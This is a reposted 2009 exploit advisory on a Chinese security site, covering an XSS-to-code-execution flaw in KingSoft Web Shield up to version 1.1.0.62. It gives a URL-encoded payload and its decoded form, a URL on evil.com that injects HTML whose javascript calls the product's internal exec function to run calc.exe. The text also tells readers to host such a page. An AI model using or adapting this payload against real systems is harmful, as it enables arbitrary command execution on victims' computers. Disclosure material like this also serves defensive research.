首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability
来源:www.vfcocus.net 作者:inking 发布时间:2009-05-20  

#
# KingSoft Web Shield XSS and Remote Code Execution Vulnerability
#
# Found by inking
#
# Version <= 1.1.0.62
#
# Background: KingSoft Web Shield is a popular anti-malwebsites production  of KingSoft Inc. around China.
#
# Details: When the KSWebShield detects a malwebsite, it sends the evil url from the web browser
# to the KSWebShield service, and popup a dialog which alerts that a malwebsite has been detected.
# Because it's unreliable filter method, the attacker can insert any HTML tag in the alert dialog.
# when the evil codes are successfully inserted, we can use javascript to call it's inner functions
# of the KSWebShield and execute any system commands.
#

# The evil url maybe like this
hxxp://evil.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e

# When decoded by the KSWebShield, the url maybe like this
hxxp://evil.com/index.php?html=<p style="background:url(javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' ))">test</p>

# Just make a website with evil javascript codes, and browse the url shows above


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dog Pedigree Online Database 1
·Joomla Casino 0.3.1 Multiple S
·Coppermine Photo Gallery <= 1.
·exJune Officer Message System
·AOL IWinAmpActiveX Class Conve
·Catviz 0.4.0b1 (LFI/XSS) Multi
·httpdx <= 0.5b FTP Server (CWD
·NC GBook 1.0 Remote Command in
·Joomla com_gsticketsystem (cat
·NC LinkList 1.3.1 Remote Comma
·Realty Web-Base 1.0 (list_list
·PHP Article Publisher Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved